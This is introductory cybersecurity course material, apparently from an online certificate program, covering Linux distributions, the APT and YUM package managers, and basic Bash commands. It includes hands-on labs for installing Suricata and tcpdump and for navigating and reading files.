few tools included with KALI LINUX™. This distribution has many tools used to conduct pen testing
and digital forensics. We've explored how KALI LINUX™ is an important distribution that's widely
used in security, but there are other distributions that security professionals use as well.
More Linux distributions
Previously, you were introduced to the different distributions of Linux. This included KALI LINUX ™.
(KALI LINUX ™ is a trademark of OffSec.) In addition to KALI LINUX ™, there are multiple other Linux
distributions that security analysts should be familiar with.
KALI LINUX ™
KALI LINUX ™ is an open-source distribution of Linux that is widely used in the security industry. This is
because KALI LINUX ™, which is Debian-based, is pre-installed with many useful tools for penetration
testing and digital forensics. A penetration test is a simulated attack that helps identify vulnerabilities in
systems, networks, websites, applications, and processes. Digital forensics is the practice of collecting
and analyzing data to determine what has happened after an attack. These are key activities in the
security industry.
However, KALI LINUX ™ is not the only Linux distribution that is used in cybersecurity.
Ubuntu
Ubuntu is an open-source, user-friendly distribution that is widely used in security and other industries.
It has both a command-line interface (CLI) and a graphical user interface (GUI). Ubuntu is also Debianderived and includes common applications by default. Users can also download many more applications
from a package manager, including security-focused tools. Because of its wide use, Ubuntu has an
especially large number of community resources to support users.
Ubuntu is also widely used for cloud computing. As organizations migrate to cloud servers,
cybersecurity work may more regularly involve Ubuntu derivatives.
Parrot
Parrot is an open-source distribution that is commonly used for security. Similar to KALI LINUX ™,
Parrot comes with pre-installed tools related to penetration testing and digital forensics. Like both KALI
LINUX ™ and Ubuntu, it is based on Debian.
Parrot is also considered to be a user-friendly Linux distribution. This is because it has a GUI that many
find easy to navigate. This is in addition to Parrot’s CLI.
Red Hat® Enterprise Linux®
Red Hat Enterprise Linux is a subscription-based distribution of Linux built for enterprise use. Red Hat is
not free, which is a major difference from the previously mentioned distributions. Because it’s built and
supported for enterprise use, Red Hat also offers a dedicated support team for customers to call about
issues.
CentOS
CentOS is an open-source distribution that is closely related to Red Hat. It uses source code published by
Red Hat to provide a similar platform. However, CentOS does not offer the same enterprise support that
Red Hat provides and is supported through the community.
Key takeaways
KALI LINUX ™, Ubuntu, Parrot, Red Hat, and CentOS are all widely used Linux distributions. It’s
important for security analysts to be aware of these distributions that they might encounter in their
career.
Package managers for installing applications
Previously, you learned about Linux distributions and that different distributions derive from different
sources, such as Debian or Red Hat Enterprise Linux distribution. You were also introduced to package
managers, and learned that Linux applications are commonly distributed through package managers. In
this reading, you’ll apply this knowledge to learn more about package managers.
Introduction to package managers
A package is a piece of software that can be combined with other packages to form an application. Some
packages may be large enough to form applications on their own.
Packages contain the files necessary for an application to be installed. These files include dependencies,
which are supplemental files used to run an application.
Package managers can help resolve any issues with dependencies and perform other management tasks.
A package manager is a tool that helps users install, manage, and remove packages or applications. Linux
uses multiple package managers.
Note: It’s important to use the most recent version of a package when possible. The most recent version
has the most up-to-date bug fixes and security patches. These help keep your system more secure.
Types of package managers
Many commonly used Linux distributions are derived from the same parent distribution. For example,
KALI LINUX ™, Ubuntu, and Parrot all come from Debian. CentOS comes from Red Hat.
This knowledge is useful when installing applications because certain package managers work with
certain distributions. For example, the Red Hat Package Manager (RPM) can be used for Linux
distributions derived from Red Hat, and package managers such as dpkg can be used for Linux
distributions derived from Debian.
Different package managers typically use different file extensions. For example, Red Hat Package
Manager (RPM) has files which use the .rpm file extension, such as Package-VersionRelease_Architecture.rpm. Package managers for Debian-derived Linux distributions, such as dpkg, have
files which use the .deb file extension, such as Package_Version-Release_Architecture.deb.
Package management tools
In addition to package managers like RPM and dpkg, there are also package management tools that
allow you to easily work with packages through the shell. Package management tools are sometimes
utilized instead of package managers because they allow users to perform basic tasks more easily, such
as installing a new package. Two notable tools are the Advanced Package Tool (APT) and Yellowdog
Updater Modified (YUM).
Advanced Package Tool (APT)
APT is a tool used with Debian-derived distributions. It is run from the command-line interface to
manage, search, and install packages.
Yellowdog Updater Modified (YUM)
YUM is a tool used with Red Hat-derived distributions. It is run from the command-line interface to
manage, search, and install packages. YUM works with .rpm files.
Key takeaways
A package is a piece of software that can be combined with other packages to form an application.
Packages can be managed using a package manager. There are multiple package managers and package
management tools for different Linux distributions. Package management tools allow users to easily
work with packages through the shell. Debian-derived Linux distributions use package managers like
dpkg as well as package management tools like Advanced Package Tool (APT). Red Hat-derived
distributions use the Red Hat Package Manager (RPM) or tools like Yellowdog Updater Modified (YUM).
Activity: Install software in a Linux distribution
Introduction
In this lab, you’ll learn how to install and uninstall applications in Linux. You’ll use Linux commands in
the Bash shell to complete this lab. You’ll also use the Advanced Package Tool (APT) package manager to
install and uninstall the Suricata and tcpdump applications.
What you’ll do
You have multiple tasks in this lab:
●
●
●
●
●
Confirm APT is installed in Bash
Install Suricata with APT
Uninstall Suricata with APT
Install tcpdump with APT
Reinstall Suricata with APT
Lab instructions
Start the lab
Before you start, you can review the Resources for completing Linux labs. Then from this page, click
Launch App. A Qwiklabs page will open and from that page, click Start Lab to begin the activity!
Best practices for completing labs:
●
●
●
●
Make sure your browser is up to date with the latest version.
Make sure your internet connection is stable.
After you complete the lab, leave the lab window open for at least 10 minutes in order to allow
the system to record your progress.
If you run into issues connecting to the lab, try logging into Coursera in an Incognito mode and
completing the lab there.
Activity overview
In this lab activity, you’ll use the Advanced Package Tool (APT) and sudo to install and uninstall
applications in a Linux Bash shell.
While installing Linux applications can be a complex task, the APT package manager manages most
of this complexity for you and allows you to quickly and reliably manage the applications in a Linux
environment.
You'll use Suricata and tcpdump as an example. These are network security applications that can be
used to capture and analyze network traffic.
The virtual machine you access in this lab has a Debian-based distribution of Linux running, and
that works with the APT package manager. Using a virtual machine prevents damage to a system in
the event its tools are used improperly. It also gives you the ability to revert to a previous state.
As a security analyst, it's likely you'll need to know how to install and manage applications on a
Linux operating system. In this lab activity, you’ll learn how to do exactly that!
Scenario
Your role as a security analyst requires that you have the Suricata and tcpdump network security
applications installed on your system.
In this scenario, you have to install, uninstall, and reinstall these applications on your Linux Bash
shell. You also need to confirm that you’ve installed them correctly.
Here’s how you'll do this: First, you’ll confirm that APT is installed on your Linux Bash shell. Next,
you’ll use APT to install the Suricata application and confirm that it is installed. Then, you’ll
uninstall the Suricata application and confirm this as well. Next, you’ll install the tcpdump
application and list the applications currently installed. Finally, you’ll reinstall the Suricata
application and confirm that both applications are installed.
OK, it's time to learn how to install some applications!
Task 1. Ensure that APT is installed
First, you’ll check that the APT application is installed so that you can use it to manage applications.
The simplest way to do this is to run the apt command in the Bash shell and check the response.
The Bash shell is the command-line interpreter currently open on the left side of the screen. You’ll
use the Bash shell by typing commands after the prompt. The prompt is represented by a dollar
sign ($) followed by the input cursor.
Confirm that the APT package manager is installed in your Linux environment. To do this,
type apt after the command-line prompt and press ENTER.
When installed, apt displays basic usage information when you run it. This includes the version
information and a description of the tool:
●
apt 1.8.2.3 (amd64)
Usage: apt [options] command
apt is a commandline package manager and provides commands for
searching and managing as well as querying information about packages.
It provides the same functionality as the specialized APT tools,
like apt-get and apt-cache, but enables options more suitable for
interactive use by default.
...
APT is already installed by default in the Linux Bash shell in this lab because this is a
Debian-based system. APT is also the recommended package manager for Debian. If you’re
using another distribution, a different package manager, such as YUM, may be available
instead.
Click Check my progress to verify that you have completed this task correctly.
Ensure that APT is installed
Check my progress
Task 2. Install and uninstall the Suricata application
In this task, you must install Suricata, a network analysis tool used for intrusion detection,
and verify that it installed correctly. Then, you’ll uninstall the application.
1. Use the APT package manager to install the Suricata application.
Type sudo apt install suricata after the command-line prompt and press ENTER.
When prompted to continue, press the ENTER key to respond with the default response.
(In this case, the default response is Yes.)
2. Verify that Suricata is installed by running the newly installed application.
Type suricata after the command-line prompt and press ENTER.
When Suricata is installed, version and usage information is listed:
Suricata 4.1.2
USAGE: suricata [OPTIONS] [BPF FILTER]
-c : path to configuration file
-T
: test configuration file (use with -c)
...
3. Use the APT package manager to uninstall Suricata.
Type sudo apt remove suricata after the command-line prompt and press ENTER.
Press ENTER (Yes) when prompted to continue.
When prompted to continue, press the ENTER key to respond with the default response.
(In this case, the default response is Yes.)
4. Verify that Suricata has been uninstalled by running the application command again.
Type suricata after the command-line prompt and press ENTER.
If you have uninstalled Suricata, the output is an error message:
-bash: /usr/bin/suricata: No such file or directory
This message indicates that Suricata can't be found anymore.
Click Check my progress to verify that you have completed this task correctly.
Install and uninstall the Suricata application
Check my progress
Task 3. Install the tcpdump application
In this task, you must install the tcpdump application. This is a command-line tool that can be used
to capture network traffic in a Linux Bash shell.
● Use the APT package manager to install tcpdump.
Type sudo apt install tcpdump after the command-line prompt and press ENTER.
Click Check my progress to verify that you have completed this task correctly.
Install the tcpdump application
Check my progress
Task 4. List the installed applications
Next, you need to confirm that you’ve installed the required applications. It's important to be able
to validate that the correct applications are installed. Often you may want to check that the correct
versions are installed as well.
1. Use the APT package manager to list all installed applications.
Type apt list --installed after the command-line prompt and press ENTER.
This produces a long list of applications because Linux has a lot of software installed by
default.
2. Search through the list to find the tcpdump application you installed.
The Suricata application is not listed because you installed and then uninstalled that
application:
...
tcpdump/oldstable,now 4.9.3-1~deb10u2 amd64 [installed]
...
Note: The specific version of tcpdump that you see displayed may be different from what is shown
above.
Click Check my progress to verify that you have completed this task correctly.
List the installed applications
Check my progress
Task 5. Reinstall the Suricata application
In this task, you must reinstall the Suricata application and verify that it has installed
correctly.
1. Run the command to install the Suricata application.
Type sudo apt install suricata after the command-line prompt and press ENTER.
When prompted to continue, press the ENTER key to respond with the default response.
(In this case, the default response is Yes.)
2. Use the APT package manager to list the installed applications.
Type apt list --installed after the command-line prompt and press ENTER.
3. Search through the list to confirm that the Suricata application has been installed.
The output should include the following lines:
...
suricata/oldstable,now 1:4.1.2-2+deb10u1 amd64 [installed]
...
tcpdump/oldstable,now 4.9.3-1~deb10u2 amd64 [installed]
...
Click Check my progress to verify that you have completed this task correctly.
Reinstall the Suricata application
Check my progress
Conclusion
Great work!
You now have practical experience with the APT package manager. You learned to:
●
●
●
install applications,
uninstall applications, and
list installed applications.
Being able to manage installed applications in Linux is a key skill for any security analyst.
Introduction to the Shell
Welcome back! In this video, we're going to discuss the Linux shell. This part of the Linux
architecture is where the action will happen for you as a security analyst. We introduced the shell
with other components of the Linux OS earlier, but let's take a deeper look at
what the shell is and what it does. The shell is the command-line interpreter. That means it helps
you communicate with the operating system through the command line. Previously, we discussed a
command-line interface. This is essentially the shell. The shell provides the command-line interface
for you to interact with the OS. To tell the OS what to do, you enter
commands into this interface. A command is an instruction telling the computer to do something.
The shell communicates with the kernel to execute these commands. Earlier, we discussed how
the operating system helps humans and computers speak with each other. The shell is the part of
the OS that allows you to do this. Think of this as a very helpful language
interpreter between you and your system. Since you do not speak computer language or binary, you
can't directly communicate with your system. This is where the shell comes in to help you. Your OS
doesn't need the shell for most of its work, but it is an interface between you and what your system
can offer. It allows you to perform math, run tests, and execute applications. More importantly, it
allows you to combine these operations and connect applications to each other to perform complex
and automated tasks. Just as there are many Linux distributions, there are many different types of
shells. We'll primarily focus on the Bash shell in this course.
Different types of shells
Knowing how to work with Linux shells is an important skill for cybersecurity professionals. Shells can
be used for many common tasks. Previously, you were introduced to shells and their functions. This
reading will review shells and introduce you to different types, including the one that you'll use in this
course.
Communicate through a shell
As you explored previously, the shell is the command-line interpreter. You can think of a shell as a
translator between you and the computer system. Shells allow you to give commands to the computer
and receive responses from it. When you enter a command into a shell, the shell executes many internal
processes to interpret your command, send it to the kernel, and return your results.
Types of shells
The many different types of Linux shells include the following:
●
●
●
●
●
Bourne-Again Shell (bash)
C Shell (csh)
Korn Shell (ksh)
Enhanced C shell (tcsh)
Z Shell (zsh)
All Linux shells use common Linux commands, but they can differ in other features. For example, ksh
and bash use the dollar sign ($) to indicate where users type in their commands. Other shells, such as
zsh, use the percent sign (%) for this purpose.
Bash
Bash is the default shell in most Linux distributions. It’s considered a user-friendly shell. You can use
bash for basic Linux commands as well as larger projects.
Bash is also the most popular shell in the cybersecurity profession. You’ll use bash throughout this
course as you learn and practice Linux commands.
Key takeaways
Shells are a fundamental part of the Linux operating system. Shells allow you to give commands to the
computer and receive responses from it. They can be thought of as a translator between you and your
computer system. There are many different types of shells, but the bash shell is the most commonly used
shell in the cybersecurity profession. You’ll learn how to enter Linux commands through the bash shell
later in this course.
Hello again! In this video, we're going to learn
a little more about the shell and how to
communicate with it. Communicating with a computer is like having a conversation
with your friend. One person asks a question and the other person
answers with a response. If you don't know the answer, you can just say you
don't know the answer. When you communicate
with the shell, the commands in the
shell can take input, give output, or give
error messages. Let's explore standard input, standard output, and error
messages in more detail. Standard input consists
of information received by the OS
via the command line. This is like you
asking your friend a question during
a conversation. The information is input from
your keyboard to the shell. If the shell can
interpret your request, it asks the kernel
for the resources it needs to execute
the related task. Let's take a look at
this through echo, a Linux command that outputs
a specified string of text. String data is data consisting of an ordered sequence
of characters. In our example, we'll just have it output the string of: hello. So, as input, we'll type:
echo
hello into the shell. Later, when we press enter,
we'll get the output. But before we do that, let's first discuss the concept
of output in more detail. Standard output is
the information returned by the OS
through the shell. In the same way that your friend gives an answer
to your question, output is a computer's response
to the command you input. Output is what you receive. Let's pick up where we left
off in our example and send the input of: echo hello to
the OS by pressing enter. Immediately, the shell
returns the output of: hello. Finally, standard error contains error messages returned by
the OS through the shell. Just like your friend might indicate that they can't
answer a question, the system responds with an error message if they can't
respond to your command. Sometimes this might occur when we misspell a command or the
system doesn't know the response to the command. Other times, it might happen
because we don't have the appropriate permissions to perform a command. We'll explore another
example that demonstrates standard error. Let's input: eco hello into the shell. Notice I
intentionally misspelled echo as e-c-o. When we press enter, an error message appears. To wrap up,
we've covered the basics of communication with the shell. Communication with the shell can only
go in one of three ways: the system receives a command—this is input; the system responds to the
command and produces output; and finally, the system doesn't know how to respond, resulting in
an error. Later, you'll become much more familiar with this as we explore commands useful for
security professionals.
Activity: Examine input and output in the shell
Introduction
In this lab, you’ll use the echo command to examine how input is received and how output is returned in
the shell. You’ll also use other Linux commands in the Bash shell to explore more about input and output
and other basic functions of the shell.
What you’ll do
You have multiple tasks in this lab:
●
●
●
●
Generate output in the shell the echo command
Perform basic calculations the expr command
Clear the shell window the clear command
Explore the commands further
Activity: Examine input/output in the Linux shell
Activity overview
Previously, you discussed how the Bash shell helps you communicate with a computer’s
operating system.
When you communicate with the shell, the commands in the shell can take input and return
output or error messages.
In this lab activity, you’ll use the echo command to examine how input is received and how
output is returned in the shell. Next, you’ll use the expr command to further explore input
and output while performing some basic calculations in the shell.
This activity will build foundations in understanding how you communicate with the Linux
operating system through the shell. As a security analyst, you'll need to input commands
into the shell and recognize when the shell returns either output or an error message.
Next, you'll explore the scenario!
Scenario
As a security professional, it’s important to understand the concept of communicating with
your computer via the shell.
In this scenario, you have to input a specified string of text that you want the shell to return
as output. You'll also need to input a few mathematical calculations so the OS (operating
system) can return the result.
Here’s how you’ll do this: First, you’ll use the echo command to generate some output in the
shell. Second, you’ll use the expr command to perform basic mathematical
calculations. Next, you’ll use the clear command to clear the Bash shell window. Finally,
you’ll have an opportunity to explore the echo and expr commands further.
Get ready to examine input and output in the Bash shell.
Start your lab
Before you begin, you can review the instructions for using the Qwiklabs platform under
the Resources tab in Coursera.
If you haven't already done so, click Start Lab. This brings up the terminal so that you can
begin completing the tasks!
When you have completed all the tasks, refer to the End your Lab section that follows the
tasks for information on how to end your lab.
Task 1. Generate output with the echo command
The echo command in the Bash shell outputs a specified string of text. In this task, you’ll use
the echo command to generate output in the Bash shell.
1. Type echo hello into the shell and press ENTER.
The hello string should be returned:
hello
The command echo hello is the input to the shell, and hello is the output from the shell.
2. Rerun the command, but include quotation marks around the string data. Type echo
"hello" into the shell and press ENTER.
The hello string should be returned again:
hello
Note: The output is the same as before. The quotation marks are optional in this case, but they tell
the shell to group a series of characters together. This can be useful if you need to pass a string that
contains certain characters that might be otherwise misinterpreted by the command.
3. Use the echo command to output your name to the shell.
Type echo "name" into the shell, replacing "name" with your own name, and press ENTER.
The name you’ve entered as the string should return as the output.
Click Check my progress to verify that you have completed this task correctly.
Generate output with the echo command
Task 2. Generate output with the expr command
In this task, you’ll use the expr command to generate some additional output in the Bash
shell. The expr command performs basic mathematical calculations and can be useful when
you need to quickly perform a calculation.
Imagine that the system has shown you that you have 32 alerts, but only 8 required action.
You want to calculate how many alerts are false positives so that you can provide feedback
to the team that configures the alerts.
To do this, you need to subtract the number of alerts that required action from the total
number of alerts.
1. Calculate the number of false positives using the expr command.
Type expr 32 - 8 into the shell and press ENTER.
The following result should be returned:
24
Note: The expr command requires that all terms and operators in an expression are separated by
spaces. For example: expr 32 - 8, and not expr 32-8.
Now, you need to calculate the average number of login attempts that are expected over the
course of a year. From the information you have, you know that an average of 3500 login
attempts have been made each month so far this year.
So, you should be able to calculate the total number of logins expected in a year by
multiplying 3500 by 12.
2. Type expr 3500 * 12 into the shell and press ENTER.
The correct result should now be returned:
42000
Click Check my progress to verify that you have completed this task correctly.
Generate output with the expr command
Task 3. Clear the Bash shell
In this task, you’ll use the clear command to clear the Bash shell of all existing output. This
allows you to start with the cursor at the top of the Bash shell window.
When you work in a shell environment, the screen can fill with previous input and output
data. This can make it difficult to process what you’re working on. Clearing the screen
allows you to create a clutter-free text environment to allow you to focus on what is
important at that point in time.
● Type clear into the shell and press ENTER.
Note: All previous commands and output will be cleared, and the user prompt and cursor will
return to the upper left of the shell window.
Click Check my progress to verify that you have completed this task correctly.
Clear the Bash shell
Optional task: Perform more calculations with
the expr command
You have the opportunity to explore input and output further using
the echo and expr commands.
1. Generate at least one new output using the echo command.
(Remember the echo "hello" output you generated).
2. Perform at least one new calculation using the expr command.
The mathematical operators you can use with the expr command for adding, subtracting,
dividing, and multiplying are +, -, / and *.
Note: The expr command performs integer mathematical calculations only, so you cannot use the
decimal point or expect a fractional result. All results are rounded down to the nearest integer. Also,
all terms and operators in an expression need to be separated by spaces. For example: expr 25 +
15, and not expr 25+15.
Conclusion
Great work!
You now have practical experience in using basic Linux Bash shell commands to
●
●
●
generate output with the echo command,
generate output with the expr command, and
clear the Bash shell with the clear command.
Understanding input and output is essential when communicating through the shell. It’s
important that you’re comfortable with these basic concepts before you go on to work with
additional commands.
Glossary terms from module 2
Terms and definitions from Course 4, Module 2
Application: A program that performs a specific task
Bash: The default shell in most Linux distributions
CentOS: An open-source distribution that is closely related to Red Hat
Central Processing Unit (CPU): A computer’s main processor, which is used to perform general
computing tasks on a computer
Command: An instruction telling the computer to do something
Digital forensics: The practice of collecting and analyzing data to determine what has happened after an
attack
Directory: A file that organizes where other files are stored
Distributions: The different versions of Linux
File path: The location of a file or directory
Filesystem Hierarchy Standard (FHS): The component of the Linux OS that organizes data
Graphical user interface (GUI): A user interface that uses icons on the screen to manage different tasks
on the computer
Hard drive: A hardware component used for long-term memory
Hardware: The physical components of a computer
Internal hardware: The components required to run the computer
Kali Linux ™: An open-source distribution of Linux that is widely used in the security industry
Kernel: The component of the Linux OS that manages processes and memory
Linux: An open source operating system
Package: A piece of software that can be combined with other packages to form an application
Package manager: A tool that helps users install, manage, and remove packages or applications
Parrot: An open-source distribution that is commonly used for security
Penetration test (pen test): A simulated attack that helps identify vulnerabilities in systems, networks,
websites, applications, and processes
Peripheral devices: Hardware components that are attached and controlled by the computer system
Random Access Memory (RAM): A hardware component used for short-term memory
Red Hat® Enterprise Linux® (also referred to simply as Red Hat in this course): A subscription-based
distribution of Linux built for enterprise use
Shell: The command-line interpreter
Standard error: An error message returned by the OS through the shell
Standard input: Information received by the OS via the command line
Standard output: Information returned by the OS through the shell
String data: Data consisting of an ordered sequence of characters
Ubuntu: An open-source, user-friendly distribution that is widely used in security and other industries
User: The person interacting with a computer
Module 3 – Navigate the Linux File System
Welcome back. Before we get into specific Linux commands, let's explore in more
detail the basics of communicating with the OS through the shell. Being able to utilize
Linux commands is a foundational skill for all security professionals. As a security analyst,
you will work with server logs and you'll need to know how to navigate, manage and analyze files
remotely without a graphical user interface. In addition, you'll need to know how to verify and
configure users and group access. You'll also need to give authorization and set file permissions.
That means that developing skills with the command line is essential for your work
as a security analyst. When we learned about the Linux architecture, we learned that the shell is one
of the main components of an operating system. We also learned that there are different shells. In
this section, we'll utilize the Bash shell. Bash is the default shell in most Linux distributions. For the
most part, the key Linux commands that you'll be learning in this section are the same across shells.
Now that you know what shell you'll be using, let's go into how to write in Bash. As we discussed in
a previous section, communicating with your OS is like a conversation. You type in commands, and
the OS responds with an answer to your command. A command is an instruction telling the
computer to do something. We'll try out a command in Bash. Notice a dollar sign before the cursor.
This is your prompt to enter a new command. Some commands might tell the computer to find
something like a specific file. Others might tell it
to launch a program. Or, it might be to output a specific string of text. In the last section, when we
discussed input and output, we explored how the echo command did this. Let's input the
echo command again. You may notice that the command we just input is not complete. If we're
going to use the echo command to output a specific string of texts, we need to specify what the
string of text is. This is what arguments are for. An argument is specific information needed by a
command. Some commands take multiple arguments. So now let's complete the echo
command with an argument. We're learning some pretty technical stuff, so how about we output
the words: "You are doing great!" We'll add this argument, and then we'll press enter
to get the output. In this example, our argument was a string of text. Arguments can provide other
types of information as well. One thing that is really
important in Linux is that all commands and arguments
are case sensitive. This includes file and directory names. Keep that in mind as you
learn more about how to use Linux in your day-to-day tasks as a security analyst. Okay, now that
we've covered the basics of entering Linux commands and arguments through the Bash
shell, we're ready to learn some specific commands.
I hope you're learning a lot about how to communicate with the Linux OS. As we continue our
journey into utilizing the Linux command line, we'll focus on how to navigate the Linux file system.
Now, I want you to imagine a tree. What did you notice first about the tree? Would you say the
trunk or the branches? These might definitely get your attention, but what about its roots?
Everything about a tree starts in the roots. Something similar happens when we think about the
Linux file system. Previously, we learned about the components of the Linux architecture. The
Filesystem Hierarchy Standard, or FHS, is the component of the Linux OS that organizes data. This
file system is a very important part of Linux because everything we do in Linux is considered a file
somewhere in the system's directory. The FHS is a hierarchical system, and just like with a tree,
everything grows and branches out from the root. The root directory is the highest-level directory
in Linux. It's designated by a single slash. Subdirectories branch off from the root directory. The
subdirectories branch out further and further away from the root directory. When describing the
directory structure in Linux, slashes are used when tracing back through these branches to the root.
For example, here, the first slash indicates
the root directory. Then it branches out a level into the home subdirectory. Another slash indicates
it is branching out again. This time it's to the analyst subdirectory that is located within home.
When working in security, it is essential that you learn to navigate a file system to locate and
analyze logs, such as log files. You'll analyze these log files for application usage and authentication.
With that background, we're now ready to learn the commands commonly used for navigating the
file system. First, pwd prints the working directory onto the screen. When you use this command,
the output tells you which directory you're currently in. Next, ls displays the names of files and
directories in the current working directory. And finally, cd navigates between directories. This is the
command you'll use when you want to change directories. Let's use these commands in Bash. First,
we'll type the command pwd to display the current location and then press enter. The output is the
path to the analyst directory where we're currently working. Next, let's input ls to display the files
and directories within the analyst directory. The output is the name of four directories: logs, old
reports, projects, and reports, and one file named updates.txt. So let's say we now want to go into
the logs directory to check for unauthorized access. We'll input: cd logs to change directories. We
won't get any output on the screen from the cd command, but if we enter pwd again, its output
indicates that the working directory is logs. Logs is a subdirectory of the analyst directory. As a
security analyst, you'll also need to know how to read file content in Linux. For example, you may
need to read files that contain configuration settings to identify potential vulnerabilities. Or, you
might look at user access reports while investigating unauthorized access. When reading file
content, there are some commands that will help you. First, cat displays the content of a file. This is
useful, but sometimes you won't want the full contents of a large file. In these cases, you can use the
head command. It displays just the beginning of a file, by default ten lines. Let's try out these
commands. Imagine that we want to read the contents of access.txt, and we're already in the
working directory where it's located. First, we input the cat command and then follow it with
the name of the file, access.txt. And Bash returns the full contents of this file. Let's compare that
to the head command. When we input the head command followed by our file name, only the first
10 lines of this file are displayed. Wow, this section had lots of action, and it's just the beginning! I'm
glad you learned how security analysts can use essential commands to
navigate the system. Next, we'll explore how to manage the system.
Navigate Linux and read file content
In this reading, you’ll review how to navigate the file system using Linux commands in Bash. You’ll
further explore the organization of the Linux Filesystem Hierarchy Standard, review several common
Linux commands for navigation and reading file content, and learn a couple of new commands.
Filesystem Hierarchy Standard (FHS)
Previously, you learned that the Filesystem Hierarchy Standard (FHS) is the component of Linux that
organizes data. The FHS is important because it defines how directories, directory contents, and other
storage is organized in the operating system.
This diagram illustrates the hierarchy of relationships under the FHS:
Under the FHS, a file’s location can be described by a file path. A file path is the location of a file or
directory. In the file path, the different levels of the hierarchy are separated by a forward slash (/).
Root directory
The root directory is the highest-level directory in Linux, and it’s always represented with a forward
slash (/). All subdirectories branch off the root directory. Subdirectories can continue branching out to
as many levels as necessary.
Standard FHS directories
Directly below the root directory, you’ll find standard FHS directories. In the diagram, home, bin, and etc
are standard FHS directories. Here are a few examples of what standard directories contain:
●
●
/home: Each user in the system gets their own home directory.
/bin: This directory stands for “binary” and contains binary files and other executables.
●
●
Executables are files that contain a series of commands a computer needs to follow to run
programs and perform other functions.
/etc: This directory stores the system’s configuration files.
/tmp: This directory stores many temporary files. The /tmp directory is commonly used by
attackers because anyone in the system can modify data in these files.
/mnt: This directory stands for “mount” and stores media, such as USB drives and hard drives.
●
Pro Tip: You can use the man hier command to learn more about the FHS and its standard directories.
User-specific subdirectories
Under home are subdirectories for specific users. In the diagram, these users are analyst and analyst2.
Each user has their own personal subdirectories, such as projects, logs, or reports.
Note: When the path leads to a subdirectory below the user’s home directory, the user’s home directory
can be represented as the tilde (~). For example, /home/analyst/logs can also be represented as ~/logs.
You can navigate to specific subdirectories using their absolute or relative file paths. The absolute file
path is the full file path, which starts from the root. For example, /home/analyst/projects is an absolute
file path. The relative file path is the file path that starts from a user's current directory.
Note: Relative file paths can use a dot (.) to represent the current directory, or two dots (..) to represent
the parent of the current directory. An example of a relative file path could be ../projects.
Key commands for navigating the file system
The following Linux commands can be used to navigate the file system: pwd, ls, and cd.
pwd
The pwd command prints the working directory to the screen. Or in other words, it returns the directory
that you’re currently in.
The output gives you the absolute path to this directory. For example, if you’re in your home directory
and your username is analyst, entering pwd returns /home/analyst.
Pro Tip: To learn what your username is, use the whoami command. The whoami command returns the
username of the current user. For example, if your username is analyst, entering whoami returns analyst.
ls
The ls command displays the names of the files and directories in the current working directory. For
example, in the video, ls returned directories such as logs, and a file called updates.txt.
Note: If you want to return the contents of a directory that’s not your current working directory, you can
add an argument after ls with the absolute or relative file path to the desired directory. For example, if
you’re in the /home/analyst directory but want to list the contents of its projects subdirectory, you can
enter ls /home/analyst/projects or just ls projects.
cd
The cd command navigates between directories. When you need to change directories, you should use
this command.
To navigate to a subdirectory of the current directory, you can add an argument after cd with the
subdirectory name. For example, if you’re in the /home/analyst directory and want to navigate to its
projects subdirectory, you can enter cd projects.
You can also navigate to any specific directory by entering the absolute file path. For example, if you’re
in /home/analyst/projects, entering cd /home/analyst/logs changes your current directory to
/home/analyst/logs.
Pro Tip: You can use the relative file path and enter cd .. to go up one level in the file structure. For
example, if the current directory is /home/analyst/projects, entering cd .. would change your working
directory to /home/analyst.
Common commands for reading file content
The following Linux commands are useful for reading file content: cat, head, tail, and less.
cat
The cat command displays the content of a file. For example, entering cat updates.txt returns everything
in the updates.txt file.
head
The head command displays just the beginning of a file, by default 10 lines. The head command can be
useful when you want to know the basic contents of a file but don’t need the full contents. Entering head
updates.txt returns only the first 10 lines of the updates.txt file.
Pro Tip: If you want to change the number of lines returned by head, you can specify the number of lines
by including -n. For example, if you only want to display the first five lines of the updates.txt file, enter
head -n 5 updates.txt.
tail
The tail command does the opposite of head. This command can be used to display just the end of a file,
by default 10 lines. Entering tail updates.txt returns only the last 10 lines of the updates.txt file.
Pro Tip: You can use tail to read the most recent information in a log file.
less
The less command returns the content of a file one page at a time. For example, entering less updates.txt
changes the terminal window to display the contents of updates.txt one page at a time. This allows you to
easily move forward and backward through the content.
Once you’ve accessed your content with the less command, you can use several keyboard controls to
move through the file:
●
●
●
●
●
Space bar: Move forward one page
b: Move back one page
Down arrow: Move forward one line
Up arrow: Move back one line
q: Quit and return to the previous terminal window
Key takeaways
It’s important for security analysts to be able to navigate Linux and the file system of the FHS. Some key
commands for navigating the file system include pwd, ls, and cd. Reading file content is also an important
skill in the security profession. This can be done with commands such as cat, head, tail, and less.
Activity: Find files with Linux commands
Introduction
In this lab, you’ll learn how to navigate a Linux file structure, locate files, and read file contents.
You’ll use Linux commands in the Bash shell to complete these steps.
What you’ll do
You have multiple tasks in this lab:
●
●
●
●
Find your current working directory and display its contents
Navigate to a directory and list subdirectories
Display the contents of a file
Display the first 10 lines of a file
Scenario
In this scenario, you have to locate and analyze the information of certain files located in
the /home/analyst directory.
Here’s how you’ll do this: First, you’ll get the information of the current working directory
you’re in and display the contents of the directory. Second, you’ll navigate to
the reports directory and list the subdirectories it contains. Third, you’ll navigate to
the users subdirectory and display the contents of the Q1_added_users.txt file. Finally, you’ll
navigate to the logs directory and display the first 10 lines of a file it contains.
To complete these tasks, you'll need to use commands that you've previously learned in
this course. Well, it's time to practice what you’ve learned. Let’s do this!
Note: The lab starts with your user account, called analyst, already logged in to the Bash shell. This
means you can start with the tasks as soon as you click the Start Lab button.
Start your lab
Before you begin, you can review the instructions for using the Qwiklabs platform under
the Resources tab in Coursera.
If you haven't already done so, click Start Lab. This brings up the terminal so that you can
begin completing the tasks!
When you have completed all the tasks, refer to the End your Lab section that follows the
tasks for information on how to end your lab.
Task 1. Get the current directory information
In this task, you must use the commands you learned about to check the current working
directory and list its contents.
1. Display your working directory.
2. Display the names of the files and directories in the current working directory.
Get the current directory information
Task 2. Change directory and list the subdirectories
In this task, you must navigate to a new directory and determine the subdirectories it
contains.
1. Navigate to the /home/analyst/reports directory.
2. Display the files and subdirectories in the /home/analyst/reports directory.
and read the contents of a file
In this task, you must navigate to a subdirectory and read the contents of a file it contains.
1. Navigate to the /home/analyst/reports/users directory.
2. List the files in the current directory.
3. Display the contents of the Q1_added_users.txt file.
What department does the employee with the username aezra work in?
Locate and read the contents of a file
Check my progress
Task 4. Navigate to a directory and locate a file
In this task, you must navigate to a new directory, locate a file, and examine the contents of
the file.
1. Navigate to the /home/analyst/logs directory.
2. Display the name of the file it contains.
3. Display the first 10 lines of this file.
